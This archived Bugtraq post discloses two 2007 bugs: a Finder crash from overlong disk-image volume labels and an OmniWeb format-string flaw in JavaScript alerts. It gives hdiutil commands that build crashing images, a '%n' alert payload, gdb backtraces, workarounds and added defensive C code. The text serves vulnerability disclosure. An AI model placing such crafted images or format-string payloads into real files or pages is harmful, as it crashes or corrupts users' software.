Bugtraq mailing list archives

DMA[2007-0107a] OmniWeb Javascript Alert Format String Vulnerability and DMA[2007-0109a] Apple Finder Disk Image Volume Label Overflow / DoS


From: "K F (lists)" <kf_lists () digitalmunition com>
Date: Wed, 10 Jan 2007 19:14:01 -0500

I've been subject to a few DoS attacks as of late so these did not quite make it out. Enjoy the typos as usual. =P

-KF
DMA[2007-0109a] - 'Apple Finder Disk Image Volume Label Overflow / DoS'
Author: Kevin Finisterre
Vendor(s): http://www.apple.com
Product: '<= OSX 10.4 (?)'
References: 
http://www.digitalmunition.com/DMA[2007-0109a].txt
http://www.apple.com/macosx/features/finder/
http://projects.info-pull.com/moab/MOAB-09-01-2007.html

Description:
Your home on the Mac, Finder gives you lots of options for locating, displaying and organizing all your 
files and folders. From the power of Spotlight search technology to the flexibility of customizable item 
views, Mac OS X Finder truly shows your Mac at a glance.

You can really piss Finder off in several ways by passing long volume labels to various types of disk 
images. Here is the hex dump of an example label that can be used to trigger the issue. 

0009c00: 4c41 424c be42 0000 0000 0001 4594 86e1  LABL.B......E...
0009c10: 00ff 4141 4141 4141 4141 4141 4141 4141  ..AAAAAAAAAAAAAA
0009c20: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009c30: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009c40: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009c50: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009c60: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009c70: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009c80: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009c90: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009ca0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009cb0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009cc0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009cd0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009ce0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009cf0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009d00: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009d10: 4100 0000 0000 0000 0000 0000 0000 0000  A...............

Creating the images is something fairly easy to do. 
$ hdiutil create -sectors 31337 -type SPARSE -fs HFS+ -volname `perl -e 'print "A" x 255'` -layout NONE test.sparseimage

$ hdiutil create test.dmg -size 01m -fs HFS+ -volname `perl -e 'print "A" x 255'` 

$ hdiutil create test.dmg -size 200k -fs UFS -volname `perl -e 'print "A" x 255'` 

Attach gdb to Finder and open any of the above .dmg files and you will see the following crash. 

(gdb) bt
#0  0xffff0ac4 in ___memcpy () at /System/Library/Frameworks/System.framework/PrivateHeaders/i386/cpu_capabilities.h:228
#1  0x90c93952 in _FSCopyExtendedAliasInfoFromAliasPtr ()
#2  0x9252939d in TNode::CreateVirtualAliasRecord ()
#3  0x92528872 in TNode::PopulateVirtualContainerFromSFL ()
#4  0x92513343 in TNodeSyncTask::SyncTaskProc ()
#5  0x90cb3f84 in PrivateMPEntryPoint ()
#6  0x90023d87 in _pthread_body ()

See Alastair's blog (http://alastairs-place.net) in about 3 days for an explanation of exploitability.

Workaround: 
Do not mount disk images, or simply disable Finder and use Spotlight instead. 

1. Open Terminal, found in /Applications -> Utilities, and then type 
   'sudo mv /System/Library/CoreServices/Finder.app /Applications/' 

2. Still in Terminal, type killall Finder -- this kills the process named Finder, and it should not restart! Note that 
   this does not affect the Dock or Exposé.

The following command will unmount a disk image in the event that your Finder has been put into a DoS condition. 
$ hdiutil unmount /Volumes/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
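The crash above is a memcpy of an attacker-chosen label length into a fixed-size buffer. The following is an added example, not code from the advisory or from Apple, showing the bounds check a defender would expect before such a copy. The record layout is a hypothetical one modelled on the hex dump (a "LABL" tag, 12 bytes of header, then a big-endian 16-bit length such as the 0x00ff seen at offset 0x9c10, then the label bytes); the real alias record format and Finder's actual buffer size are not documented on the page, so LABEL_MAX and the offsets are assumptions for illustration only.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout, modelled on the dump: "LABL" + 12-byte header + u16 BE length + bytes. */
#define LABEL_TAG_LEN    4
#define LABEL_HDR_LEN    12
#define LABEL_FIELD_OFF  (LABEL_TAG_LEN + LABEL_HDR_LEN)   /* 16: offset of the length field */
#define LABEL_MAX        32   /* assumed capacity of the fixed destination buffer */

enum label_status { LABEL_OK = 0, LABEL_BAD_TAG, LABEL_SHORT, LABEL_TOO_LONG };

/* Bounds-checked extraction: the length read from the record is validated
 * against both the bytes actually present and the destination capacity
 * before any memcpy happens. On success `out` is NUL-terminated. */
enum label_status copy_label_checked(const uint8_t *rec, size_t reclen,
                                     char *out, size_t outcap)
{
    if (reclen < LABEL_TAG_LEN || memcmp(rec, "LABL", LABEL_TAG_LEN) != 0)
        return LABEL_BAD_TAG;
    if (reclen < LABEL_FIELD_OFF + 2)
        return LABEL_SHORT;                       /* no room for the length field */
    size_t len = ((size_t)rec[LABEL_FIELD_OFF] << 8) | rec[LABEL_FIELD_OFF + 1];
    if (len > reclen - (LABEL_FIELD_OFF + 2))
        return LABEL_SHORT;                       /* declared length exceeds record */
    if (outcap == 0 || len > outcap - 1)
        return LABEL_TOO_LONG;                    /* would overflow the destination */
    memcpy(out, rec + LABEL_FIELD_OFF + 2, len);
    out[len] = '\0';
    return LABEL_OK;
}

/* Constructed sample record: a label of `len` 'A' bytes, like the dump.
 * Returns the record length, or 0 if buf cannot hold it. */
size_t make_label_record(uint8_t *buf, size_t bufcap, size_t len)
{
    size_t total = LABEL_FIELD_OFF + 2 + len;
    if (len > 0xffff || total > bufcap)
        return 0;
    memset(buf, 0, total);
    memcpy(buf, "LABL", LABEL_TAG_LEN);
    buf[LABEL_FIELD_OFF]     = (uint8_t)(len >> 8);
    buf[LABEL_FIELD_OFF + 1] = (uint8_t)(len & 0xff);
    memset(buf + LABEL_FIELD_OFF + 2, 'A', len);
    return total;
}

/* Parse a constructed record with `len` A's into a LABEL_MAX buffer. */
enum label_status check_label_of_length(size_t len)
{
    uint8_t rec[LABEL_FIELD_OFF + 2 + 300];
    char out[LABEL_MAX];
    size_t n = make_label_record(rec, sizeof rec, len);
    if (n == 0)
        return LABEL_SHORT;
    return copy_label_checked(rec, n, out, sizeof out);
}

/* A record that declares 255 bytes but is truncated after 30 bytes. */
enum label_status check_truncated_record(void)
{
    uint8_t rec[LABEL_FIELD_OFF + 2 + 300];
    char out[LABEL_MAX];
    make_label_record(rec, sizeof rec, 255);
    return copy_label_checked(rec, 30, out, sizeof out);
}

int main(void)
{
    printf("8 bytes:   %d\n", (int)check_label_of_length(8));     /* LABEL_OK */
    printf("255 bytes: %d\n", (int)check_label_of_length(255));   /* LABEL_TOO_LONG */
    printf("truncated: %d\n", (int)check_truncated_record());     /* LABEL_SHORT */
    return 0;
}
```

The point of the two separate checks is that a length field can lie in either direction: larger than the bytes present (over-read) or larger than the destination (over-write). The advisory's 255-byte label is rejected by the second check rather than copied.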


DMA[2007-0107a] - 'OmniWeb Javascript Alert Format String Vulnerability'
Author: Kevin Finisterre
Vendor(s): http://www.omnigroup.com
Product: 'OmniWeb 5.51 (?)'
References: 
http://www.digitalmunition.com/DMA[2007-0107a].txt
http://www.omnigroup.com/applications/omniweb/
http://projects.info-pull.com/moab/MOAB-07-01-2007.html
http://www.omnigroup.com/applications/omniweb/download/
http://blog.omnigroup.com/2007/01/07/omniweb-552-now-available-and-more-secure/

Description:
You're a Mac fan, right? When people ask you why you like the Mac, you probably think of the attention to detail that 
makes the Mac user experience superior. It's the sum of a lot of different things that add up to a system that's more 
powerful, more beautiful, and more fun.

What if you thought of a web browser in the same way? You use a web browser all the time, for working, for 
entertainment, for research; how cool would it be if every time you used it, you thought "Wow, this rules!"

Welcome to OmniWeb. OmniWeb elevates your web user experience to be more productive, more efficient, and more fun. 
You'll find information more quickly. You'll stay organized. You'll see the entire internet the way you choose. It's the 
browser that puts you in control.

Sure, you can use a standard web browser, with standard features. But you didn't choose a standard software experience 
- you chose the Mac. Why not try a browser built just for discriminating people with fabulous taste, like yourself? 

The only real reason to not make use of such a fabulous browser would be bad code.

(gdb) r /Users/MacFan/Sites/test.html
Starting program: /Applications/OmniWeb.app/Contents/MacOS/OmniWeb /Users/MacFan/Sites/test.html
Reading symbols for shared libraries 
...................++..++.......................................................++++
++++.......++. done
OCCCrashCatcher: Not enabling crash catching since we're connected to a tty (and thus presumably in gdb)
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Reading symbols for shared libraries .. done
Reading symbols for shared libraries ... done

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x005dec56
0x9000c0c1 in __vfprintf ()
(gdb) bt
#0  0x9000c0c1 in __vfprintf ()
#1  0x90100ea9 in snprintf_l ()
#2  0x908119d5 in _CFStringAppendFormatAndArgumentsAux ()
#3  0x9081091c in _CFStringCreateWithFormatAndArgumentsAux ()
#4  0x925daa5d in -[NSPlaceholderString initWithFormat:locale:arguments:] ()
#5  0x925fc670 in -[NSString initWithFormat:arguments:] ()
#6  0x9336056f in -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] ()
#7  0x934ac77a in _NXDoLocalRunAlertPanel ()
#8  0x934ac4cc in NSRunAlertPanel ()
#9  0x000b6a6e in -[OWTab(WebUIDelegate) webView:runJavaScriptAlertPanelWithMessage:] ()
#10 0x005ded54 in -[WebFrameBridge runJavaScriptAlertPanelWithMessage:] ()
(gdb) shell cat /Users/MacFan/Sites/test.html
<script>alert('%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n')</script>

Workaround:
Download the latest version of OmniWeb or see the MOAB Fixes Google group for a workaround
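The backtrace shows the JavaScript alert text reaching -[NSString initWithFormat:arguments:] as the format string itself, which is why the %n directives in test.html end up inside __vfprintf. The following is an added example, not OmniWeb's or Omni Group's code, written in plain C to show the safe pattern and a simple audit check. The untrusted message is always passed as a %s argument behind a fixed format (the Objective-C equivalent being NSRunAlertPanel(title, @"%@", ..., msg)); the helper names and the constructed sample message are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Hardened alert builder: the untrusted text is an argument to a fixed
 * format string, never the format itself, so "%n" inside it is inert.
 * Returns what snprintf returns, so callers can detect truncation. */
int build_alert_safe(char *out, size_t outlen, const char *title, const char *user_msg)
{
    return snprintf(out, outlen, "%s\n\n%s", title, user_msg);
}

/* Audit helper: count printf conversion directives in untrusted text.
 * "%%" is an escaped percent sign and is not counted. Useful for
 * logging or tests that flag input which must never reach a format
 * position. */
size_t count_format_directives(const char *s)
{
    size_t n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {   /* skip the escaped pair */
            p++;
            continue;
        }
        n++;
    }
    return n;
}

/* Returns 1 when the message body survives formatting byte-for-byte,
 * i.e. no directive in it was interpreted. */
int message_rendered_verbatim(const char *user_msg)
{
    char buf[512];
    int written = build_alert_safe(buf, sizeof buf, "Alert", user_msg);
    if (written < 0 || (size_t)written >= sizeof buf)
        return 0;
    const char *body = strstr(buf, "\n\n");
    return body != NULL && strcmp(body + 2, user_msg) == 0;
}

int main(void)
{
    /* Constructed sample with the same shape as the advisory's test.html */
    const char *msg = "%n%n%n%n";
    char buf[256];
    build_alert_safe(buf, sizeof buf, "JavaScript", msg);
    printf("directives in input: %zu\n", count_format_directives(msg));
    printf("rendered verbatim:   %d\n", message_rendered_verbatim(msg));
    printf("%s\n", buf);
    return 0;
}
```

In a code review the thing to grep for is any variadic formatting call (NSRunAlertPanel, NSLog, [NSString stringWithFormat:], printf-family) whose first format argument is not a literal; the fix is mechanical, as the 5.52 release referenced above shows.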

